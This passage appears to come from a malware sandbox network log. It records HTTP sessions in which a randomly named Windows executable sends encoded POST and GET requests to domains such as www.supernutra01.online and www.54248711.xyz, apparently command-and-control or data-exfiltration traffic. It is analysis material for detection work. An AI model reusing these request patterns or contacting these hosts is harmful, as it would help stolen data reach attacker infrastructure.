                                                                                Data Ascii: NVK8=BXNVj2fR12wF01dE8gljG8Sja9jdhcAVceME6YP5xzLrNvSgJqHq5EyLvG8dVTOH3QVxliJS6AQ+fqE+9TGD5CKa5Jcu7AOe+/0Z2mpLBummb8cTTcaXJbutx5gceSsS8E8LDswbgsRgPyaOT0+hGi2rnVItqeliYq4KBYLRA5L7nS0TY41rHWAgI/NezK905O/LFFZDjrQwlBOrmxI0vceJFQV7
                                                                                 Dec 14, 2024 13:52:55.020826101 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                Date: Sat, 14 Dec 2024 12:52:54 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cv9Q2Dq7%2FjZ0wdszFfkUqD65OPYAFJxg28HE42RueqcO1wdZdjsMSfZ%2FStxbb6FHAXulg9G6ZhF%2FToylKTEHpMZTiEMk%2BhE5v8B8de%2BEiobsYFl4Xo8elgTiuwdUUdY0CyyjQWPzaDAd2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e55717f954366-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1812&rtt_var=906&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to
                                                                                 Dec 14, 2024 13:52:55.020905972 CET | 123 | IN | Data Raw: 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e
                                                                                Data Ascii: disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 43 | 192.168.2.5 | 50052 | 172.67.220.36 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:56.389866114 CET | 1795 | OUT | POST /b156/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.supernutra01.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.supernutra01.online
                                                                                Referer: http://www.supernutra01.online/b156/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 42 58 4e 56 6a 32 66 52 31 32 77 46 30 31 64 45 38 67 6c 6a 47 38 53 6a 61 39 6a 64 68 63 41 56 63 65 4d 45 36 59 50 35 78 7a 54 72 4d 64 71 67 47 74 37 71 6a 45 79 4c 6d 6d 38 51 56 54 4f 4b 33 51 64 39 6c 69 56 34 36 43 34 2b 4e 5a 4d 2b 70 79 47 44 7a 43 4b 61 38 35 63 74 6d 51 4f 78 2b 2f 6b 56 32 69 46 4c 42 75 6d 6d 62 2f 55 54 51 4e 61 58 5a 72 75 75 30 35 67 59 4d 69 73 70 38 41 51 31 44 73 39 6d 67 39 78 67 50 52 79 4f 52 43 4b 68 4c 69 32 74 6b 56 49 31 71 65 5a 70 59 71 6c 31 42 5a 2f 33 41 35 7a 37 6c 45 46 7a 4d 61 78 54 61 57 6b 57 4d 2b 56 74 79 2f 6c 4a 37 4f 7a 37 45 6c 52 4d 76 71 51 38 6c 55 79 37 7a 6a 46 4c 7a 39 57 68 56 32 6f 4f 77 4e 68 48 62 50 32 33 63 65 53 6d 6d 4d 65 53 47 2f 44 49 6f 4b 4c 6f 6f 42 6a 76 59 43 34 61 75 6d 6b 41 56 7a 62 58 54 45 37 2b 47 6d 76 7a 6a 6b 58 63 35 36 63 70 4b 4b 6b 52 5a 6a 42 42 6d 6b 6c 31 4b 52 76 38 75 34 44 44 69 78 53 78 73 5a 59 34 54 2f 58 37 48 73 39 4b 38 52 63 5a 48 68 58 2f 74 75 6f 73 52 76 41 4e 6c 41 43 4c 6c [TRUNCATED]
                                                                                 Data Ascii: NVK8= [TRUNCATED]
                                                                                 Dec 14, 2024 13:52:57.703147888 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                Date: Sat, 14 Dec 2024 12:52:57 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2F8ebkqAwmEaHK23B86%2BGgJSbnNuM%2FU7G6ixEI9kheoKDXLpUHHCA%2B0Lmt0ybnqgrDgDeRLeNbk%2FhuaUGBmQly2%2FQGLfRVyL6xlqjjzI3FHy4EtthMNOoez4gzApdymyTTIrb21oKwZifw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5582295232fc-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3391&min_rtt=3391&rtt_var=1695&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
                                                                                 Dec 14, 2024 13:52:57.703166008 CET | 127 | IN | Data Raw: 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49
                                                                                Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 44 | 192.168.2.5 | 50053 | 172.67.220.36 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:52:59.044490099 CET | 488 | OUT | GET /b156/?NVK8=MVl1gD/31V017FUigyITB4WoU9vk2cZhWu89n4n57hetIOD+Bt387g2PwEolcziFwxZdvjZz2ToeNo5P6wKUsiSm8Z0p8wGBislo5nJGFMbTDcQ3U8CjU56G6a4dIAJwvA==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.supernutra01.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                 Dec 14, 2024 13:53:00.357136965 CET | 845 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 14 Dec 2024 12:53:00 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                                                Accept-Ranges: bytes
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BK3qG9QyeXzbKuRB%2BRUY%2BnRhFawshXUSEIP0vMsZ6fLAzNDbGE0TYhGo8bNQvdmTStcaCEtiAHGl6PrLuEFLOREAe7w596dZyJiDG8p0utQbvWmaCgVR%2BTGGvFk20Yver43yMvM60Ix5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8f1e5592ceea1861-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1473&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                 Dec 14, 2024 13:53:00.357352972 CET | 1236 | IN | Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61
                                                                                Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robo
                                                                                 Dec 14, 2024 13:53:00.357395887 CET | 1236 | IN | Data Raw: 63 68 61 69 6e 69 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66
                                                                                Data Ascii: chaining:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:center;justify-con
                                                                                 Dec 14, 2024 13:53:00.357433081 CET | 1236 | IN | Data Raw: 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 30 36 32 35 72
                                                                                Data Ascii: ;justify-content:center;align-items:center;text-align:center;border-radius:1.0625rem;font-weight:500;padding:.375rem .8125rem}@media (min-width:45.625em){.window-main__actions,.window-main__body{margin-top:1.875rem}.window-main{padding:3.75rem
                                                                                 Dec 14, 2024 13:53:00.357573986 CET | 1236 | IN | Data Raw: 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e
                                                                                Data Ascii: w - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)}}@supports not (padding-right:clamp(1.5rem ,-4.
                                                                                 Dec 14, 2024 13:53:00.357609987 CET | 1236 | IN | Data Raw: 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 72 65 6d 20 2b 20 2e 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30
                                                                                Data Ascii: 268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(100vw - 20rem)/ 25.625)}}@supports (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:clamp(.875rem ,.7286585366rem + .7
                                                                                 Dec 14, 2024 13:53:00.357646942 CET | 1236 | IN | Data Raw: 6d 70 28 2e 37 35 72 65 6d 20 2c 2e 36 35 32 34 33 39 30 32 34 34 72 65 6d 20 2b 20 2e 34 38 37 38 30 34 38 37 38 76 77 20 2c 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c
                                                                                Data Ascii: mp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:calc(.75rem + .125*(100vw - 20rem)/ 25.625)}}@supports (margin-top:clamp
                                                                                 Dec 14, 2024 13:53:00.357687950 CET | 1236 | IN | Data Raw: 09 09 09 09 3c 2f 67 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 37 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 31 5f 66 5f 32 30 30 31 5f 35 29 22 3e 0a 09 09 09 09 09 09 09 3c 65 6c 6c 69 70 73 65 20 63
                                                                                Data Ascii: </g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 316.613 398.839)" fill="#15B1F9" /></g><
                                                                                 Dec 14, 2024 13:53:00.358001947 CET | 1236 | IN | Data Raw: 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e
                                                                                Data Ascii: in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" he
                                                                                 Dec 14, 2024 13:53:00.358040094 CET | 1236 | IN | Data Raw: 20 73 65 72 76 65 72 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09
                                                                                Data Ascii: server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></div><svg class="svg-two" width=
                                                                                 Dec 14, 2024 13:53:00.361609936 CET | 583 | IN | Data Raw: 74 69 6f 6e 3d 22 37 35 22 20 72 65 73 75 6c 74 3d 22 65 66 66 65 63 74 31 5f 66 6f 72 65 67 72 6f 75 6e 64 42 6c 75 72 5f 32 30 30 31 5f 31 30 22 20 2f 3e 0a 09 09 09 09 09 09 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 09 3c 66 69 6c 74
                                                                                Data Ascii: tion="75" result="effect1_foregroundBlur_2001_10" /></filter><filter id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFl


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 45 | 192.168.2.5 | 50054 | 162.0.217.35 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:53:06.101859093 CET | 737 | OUT | POST /e48k/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.54248711.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.54248711.xyz
                                                                                Referer: http://www.54248711.xyz/e48k/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 38 41 4a 67 71 4c 48 58 62 43 49 46 4b 39 33 58 56 43 47 39 39 55 2f 6e 4e 57 34 76 71 64 56 4d 33 6f 6a 52 35 6c 66 6d 6d 34 56 64 34 4d 64 38 34 67 4b 71 30 4b 42 6b 6a 6c 53 35 76 2f 63 69 75 67 4b 69 36 32 42 43 38 50 41 6e 61 62 6e 43 42 77 65 6d 67 78 55 30 65 5a 61 36 6a 75 36 4a 32 79 59 35 4b 30 49 30 4d 53 6d 6e 32 70 38 34 46 46 55 63 78 73 62 4d 77 4c 31 57 2f 7a 5a 63 69 4b 76 4f 45 33 72 73 67 4f 68 75 6e 69 7a 4d 6a 6c 62 58 70 34 4d 73 35 75 32 4b 2f 37 36 61 6b 69 6d 44 53 34 5a 44 79 4f 51 4a 30 53 2f 57 58 58 71 2f 45 42 32 31 4c 33 30 32 59 77 63 63 50 67 69 76 4c 7a 30 3d
                                                                                Data Ascii: NVK8=8AJgqLHXbCIFK93XVCG99U/nNW4vqdVM3ojR5lfmm4Vd4Md84gKq0KBkjlS5v/ciugKi62BC8PAnabnCBwemgxU0eZa6ju6J2yY5K0I0MSmn2p84FFUcxsbMwL1W/zZciKvOE3rsgOhunizMjlbXp4Ms5u2K/76akimDS4ZDyOQJ0S/WXXq/EB21L302YwccPgivLz0=


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 46 | 192.168.2.5 | 50057 | 162.0.217.35 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 14, 2024 13:53:08.768383980 CET | 757 | OUT | POST /e48k/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.54248711.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.54248711.xyz
                                                                                Referer: http://www.54248711.xyz/e48k/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 38 41 4a 67 71 4c 48 58 62 43 49 46 46 34 6e 58 58 68 2b 39 31 55 2f 6b 55 32 34 76 6a 39 55 46 33 6f 6e 52 35 6e 7a 32 6e 4b 42 64 68 74 74 38 71 30 65 71 34 71 42 6b 6f 46 53 77 72 2f 63 70 75 67 47 71 36 79 4a 43 38 50 55 6e 61 65 44 43 64 54 32 6e 67 68 55 32 57 35 61 34 2b 2b 36 4a 32 79 59 35 4b 77 68 68 4d 53 65 6e 32 5a 4d 34 48 67 6f 64 76 63 62 50 33 4c 31 57 31 6a 5a 59 69 4b 75 74 45 32 33 4b 67 4d 70 75 6e 6e 33 4d 6a 30 61 6c 67 34 4d 69 7a 4f 33 67 75 4c 54 67 2b 6b 6d 4f 5a 62 39 65 79 66 38 73 31 6b 4f 38 4e 31 69 58 58 68 61 4e 62 6b 38 42 4a 41 39 31 56 44 79 66 56 6b 68 30 39 59 31 55 71 70 77 65 71 75 73 45 79 70 38 6a 71 45 6b 36
                                                                                Data Ascii: NVK8=8AJgqLHXbCIFF4nXXh+91U/kU24vj9UF3onR5nz2nKBdhtt8q0eq4qBkoFSwr/cpugGq6yJC8PUnaeDCdT2nghU2W5a4++6J2yY5KwhhMSen2ZM4HgodvcbP3L1W1jZYiKutE23KgMpunn3Mj0alg4MizO3guLTg+kmOZb9eyf8s1kO8N1iXXhaNbk8BJA91VDyfVkh09Y1UqpwequsEyp8jqEk6


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                47 | 192.168.2.5 | 50058 | 162.0.217.35 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:53:11.435384989 CET | 1774 | OUT | POST /e48k/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.54248711.xyz
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.54248711.xyz
                                                                                Referer: http://www.54248711.xyz/e48k/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 38 41 4a 67 71 4c 48 58 62 43 49 46 46 34 6e 58 58 68 2b 39 31 55 2f 6b 55 32 34 76 6a 39 55 46 33 6f 6e 52 35 6e 7a 32 6e 4c 35 64 39 50 6c 38 34 46 65 71 37 71 42 6b 68 6c 53 31 72 2f 63 30 75 6a 32 6d 36 79 4e 38 38 4d 73 6e 62 34 66 43 52 79 32 6e 72 68 55 32 61 5a 61 37 6a 75 36 59 32 79 6f 31 4b 30 4e 68 4d 53 65 6e 32 62 55 34 44 31 55 64 74 63 62 4d 77 4c 31 67 2f 7a 5a 6b 69 4a 66 57 45 32 69 78 67 63 4a 75 6e 48 48 4d 67 47 79 6c 34 6f 4d 67 30 4f 33 34 75 4c 50 46 2b 6b 53 6f 5a 61 49 57 79 63 63 73 33 31 58 39 61 55 37 50 43 53 61 4d 55 55 73 79 54 56 6c 76 4b 6c 6d 61 63 44 78 61 68 64 4d 2b 2f 2f 77 39 6f 4f 78 55 6c 74 41 30 6c 52 70 36 38 56 5a 78 42 57 77 38 6e 46 39 6a 36 6d 71 4d 35 75 71 76 31 5a 45 6a 6f 32 4f 58 30 38 79 65 48 77 42 43 66 55 77 4f 56 43 6d 45 7a 70 74 6c 73 4f 79 58 73 41 51 72 64 46 51 39 77 45 35 33 2b 72 44 66 57 2b 51 57 70 6d 37 44 78 57 41 72 33 48 75 2b 69 4c 32 32 73 41 43 4c 58 67 64 37 30 65 55 48 67 67 2b 75 4a 43 30 63 48 46 37 76 55 [TRUNCATED]
                                                                                Data Ascii: NVK8= [TRUNCATED]
                                                                                Dec 14, 2024 13:53:13.018359900 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1251
                                                                                date: Sat, 14 Dec 2024 12:53:12 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
